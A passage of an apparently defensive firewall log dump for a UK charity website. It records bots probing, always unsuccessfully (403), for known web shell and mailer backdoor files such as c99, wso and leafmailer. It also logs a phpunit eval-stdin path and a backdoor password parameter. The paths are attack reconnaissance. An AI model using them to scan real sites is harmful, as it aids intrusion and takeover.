3.5.30729)\"}','p03KZmi9cuLMDtVhaylsSfPr',0,1674319804.4854,98,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/5index.php?http://equalitywalk.org.uk/5index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i4WdDG76EFZeQgs9YfJ8mNka',0,1674319805.9548,104,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/6index.php?http://equalitywalk.org.uk/6index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bHD0k5dN1ezISMha438OEguK',0,1674319809.5082,101,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/7index.php?http://equalitywalk.org.uk/7index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZsQFHRbAnfW51ErI2doOVwvi',0,1674319811.3603,119,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/8index.php?http://equalitywalk.org.uk/8index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AauTzgin2Lb7c3hNWMlj9Vxw',0,1674319813.4397,102,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/9index.php?http://equalitywalk.org.uk/9index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LpF8klbSzOoUsXBq6atVR3YA',0,1674319816.3827,115,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/Leaf.php?http://equalitywalk.org.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J4Niua2yf7F9wDoCbSdWhPec',0,1674319820.5956,112,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/Uploader.php?http://equalitywalk.org.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nvOgU2IkYlwX4fdSGrp8hEJo',0,1674319823.4874,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/wp-red.php?http://equalitywalk.org.uk/wp-includes/wp-red.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mbVjKxQoD0Ii69dOvMyftgRS',0,1674319827.1077,107,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/.well-known/radio.php?http://equalitywalk.org.uk/.well-known/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BIwLD5JtdTWyX4Q0b72YMjPk',0,1674319828.7944,132,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alfashell.php?http://equalitywalk.org.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','76oYfASVm49ZhQDdJbO0njBU',0,1674319831.4647,95,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/am.php?http://equalitywalk.org.uk/am.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aJihq56vgnQpAZuoBwdsWODm',0,1674319834.3366,101,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/blog/fw.php?http://equalitywalk.org.uk/blog/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NRASTwtnJVqBIgbx8p4lFQ09',0,1674319836.7753,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/contacts.php?http://equalitywalk.org.uk/contacts.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pSMvNDKTEf8qbW50Ln4Q1JhX',0,1674319839.4803,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/demo328/fw.php?http://equalitywalk.org.uk/demo328/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2gOPurpHjUE7X8BZKoATzivb',0,1674319841.8098,111,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/gif.php?http://equalitywalk.org.uk/gif.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oSstMayjBzqc8V0r4U5Cf6E7',0,1674319843.1229,104,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/goods.php?http://equalitywalk.org.uk/goods.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6Z7Nnu0zTUKIhesfxOQcWLvd',0,1674319844.7512,134,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/images/sym.php?http://equalitywalk.org.uk/images/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qEjIr2kTKlysYmOUASxXhGvP',0,1674319847.1051,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/lab.php?http://equalitywalk.org.uk/lab.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lcnyCaDQHWhmBFAfbrdkz3Sp',0,1674319850.9160,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/leaf_mailer.php?http://equalitywalk.org.uk/leaf_mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0zphBlgL8ObMTFI4rdDsu3X9',0,1674319854.1864,99,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/leaf_php.php?http://equalitywalk.org.uk/leaf_php.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','34WqBo2xYnUaSDE8srL56jCd',0,1674319859.2867,107,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/libraries/joomla/jmail.php?http://equalitywalk.org.uk/libraries/joomla/jmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UA0odCiWIEzqYFHKasgu7NJP',0,1674319860.8790,91,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/libraries/joomla/jmails.php?http://equalitywalk.org.uk/libraries/joomla/jmails.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','50HADFwIWLSUcOnPaRi1eBz4',0,1674319865.7159,107,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/mailer1.php?http://equalitywalk.org.uk/mailer1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WLh02zBVkHnumbN3qS5Ucpts',0,1674319869.6215,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ms.php?http://equalitywalk.org.uk/ms.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SreV0J68MFDsonCGwXc1QU4q',0,1674319871.8733,151,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/rxr.php?http://equalitywalk.org.uk/rxr.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','p1CTDsMfura4tUPBI8YRy0nW',0,1674319876.6480,112,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/srx.php?http://equalitywalk.org.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3UAzXcf6uodVI98YZ4EemOPH',0,1674319880.2428,118,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/tuco.php?http://equalitywalk.org.uk/tuco.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oYpawA1GF94Nhi6H8zVcTjtd',0,1674319884.8708,156,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/unix.php?http://equalitywalk.org.uk/unix.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SAeKlX749xtmasvjFhJ2RfTP',0,1674319889.3570,108,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/uploads/up.php?http://equalitywalk.org.uk/uploads/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EJ9laAo7RzXNixwyuT2sbKFm',0,1674319892.8980,106,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/css/colors/coffee/fw.php?http://equalitywalk.org.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cx0OIkGwfjLuiR1EWY7rMH4v',0,1674319897.4057,125,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/css/fw.php?http://equalitywalk.org.uk/wp-admin/css/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','k498FlWvDIQYuMLj16OmaVcq',0,1674319903.4794,120,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/includes/fw.php?http://equalitywalk.org.uk/wp-admin/includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0ghq9K6leJNm41tM82oEbABI',0,1674319905.2074,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/maint/fw.php?http://equalitywalk.org.uk/wp-admin/maint/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eQWDdY5umRkN4pLFZg6jhIBv',0,1674319907.7835,109,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-mna.php?http://equalitywalk.org.uk/wp-mna.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bE4hOPljzXxaK8VwTJ6Q1iek',0,1674319923.1448,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/uploads/upload.php?http://equalitywalk.org.uk/uploads/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5YlbyxmVKt3re90FZnzw7sk1',0,1674319926.6670,153,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wpx.php?http://equalitywalk.org.uk/wpx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HzO2wQvXt3UudMLFJB1lkE84',0,1674319929.2126,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/images/c99.php?http://equalitywalk.org.uk/images/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wFZpMN0La9izJfgSnq68cvkV',0,1674319930.9689,122,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xhell.php?http://equalitywalk.org.uk/xhell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Dn1hrzSJkWKIXZ97c5qRBEH6',0,1674319934.1461,111,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xmrlpc.php?http://equalitywalk.org.uk/xmrlpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','s4V3X8uonkDpM59qjTSAzmLI',0,1674319939.7720,101,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xz.php?http://equalitywalk.org.uk/xz.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0wTctD7Orfeg5F8JxCvUGyMz',0,1674319942.7094,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/yuuki.php?http://equalitywalk.org.uk/yuuki.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TMCVklJKUaghY6ODRjdH0mFB',0,1674319944.2003,119,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/shapes.php?http://equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Etz4h60KaFYsfg7qQTo83nZU',0,1674319974.8052,125,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/XxX.php?http://equalitywalk.org.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XvZisFahYq6V8BDCu4nc9ETI',0,1674319978.0775,123,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/Marvins.php?http://equalitywalk.org.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gykjIzSYKqXQWDEJa2R1NOBb',0,1674319981.4864,99,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/css/modules.php?http://equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4vaWUsqKeSbXMnfLk7GZ0T1D',0,1674319986.3390,111,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/olux.php?http://equalitywalk.org.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BCzRx2JXLIfUqZksTYSEoruO',0,1674319990.9190,129,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/indoxploit.php?http://equalitywalk.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UcyMZq1Ykm7nWEb5LjdrB6Fp',0,1674319992.8608,99,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wso.php?http://equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SsNXjHynQ24vJIe6qPYb80KG',0,1674319994.7406,98,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-commentin.php?http://equalitywalk.org.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ChUS7daTLbgmZsqRiyfrV4vz',0,1674320014.0700,100,'','GET',403,0,700,0,1,'',0),('5.161.125.79',94469455,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cAMfWyFkUBXPRvne5saqzGSr',0,1674320972.9760,969,'','GET',403,0,700,0,1,'',0),('5.161.125.79',94469455,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rEYzQ7uUfZ0yMNqRn5AaIW2m',0,1674320982.6452,708,'','GET',403,0,700,0,1,'',0),('5.161.125.79',94469455,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tEXI4fRFpmQBan1HcVerWoK3',0,1674321001.8642,1159,'','GET',403,0,700,0,1,'',0),('5.161.125.79',94469455,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sY75oVH2fytuQbMKLe38dBES',0,1674321009.4855,974,'','GET',403,0,700,0,1,'',0),('5.161.125.79',94469455,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ZC7xs0QkP1YRupcahlFy9mN3',0,1674321018.6175,859,'','GET',403,0,700,0,1,'',0),('196.119.27.174',3296140206,'','https://equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','gFyu0QSvwjJad3bsO1Ypoe6N',0,1674325834.0403,116,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4Ph7asgX5z2mr3ZFR1wIGWx8',0,1674328912.8803,222,'','POST',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.equalitywalk.org.uk/tfvlypvb.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WG8gnxRtdHm5OVMAewZQifEY',0,1674328913.1968,121,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','GE7rF2cAQHhdUpSijW5wvXlM',0,1674328930.1631,145,'','GET',403,0,700,0,1,'',0),('104.243.43.10',1760766730,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','PASjp2DYBE1CHWolRnFzTytG',0,1674328930.4655,145,'','GET',403,0,700,0,1,'',0),('185.150.191.61',3113664317,'','https://equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jyl6cXNxr9IQnTA0F3aZ72vY',0,1674333034.2869,214,'','POST',403,0,700,0,1,'',0),('185.150.191.61',3113664317,'','https://equalitywalk.org.uk/gzypqdkj.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SpRdTAXWQeKZh6Ej15CavsHn',0,1674333034.5889,95,'','GET',403,0,700,0,1,'',0),('185.150.191.61',3113664317,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','6DFtVajeGBNX7RAZ3gEsQkwU',0,1674333037.0116,95,'','GET',403,0,700,0,1,'',0),('185.150.191.61',3113664317,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','3lHE1qgJPeQ0fS5v4GnF6YUA',0,1674333037.3035,96,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/leafmailer2.8.php?http://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VF49DikShCfAzZcE1olYTpUn',0,1674335481.7903,110,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/leaf.php?http://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bZNtxU7GsMdvPhcOyE2YFQmW',0,1674335485.2978,156,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/lf.php?http://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','85AUfyxd0tvgZcrPBpDQOuWG',0,1674335488.7586,425,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/leafmailer.php?http://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QUeDk7cPqtNfOd9RaZx5bwGA',0,1674335492.7275,115,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/wp-conetnt/leaf.php?http://www.equalitywalk.org.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MZe1VAt3R7gE0YG8uibK5Pfy',0,1674335496.2137,132,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://www.equalitywalk.org.uk/wp-admin/leaf.php?http://www.equalitywalk.org.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 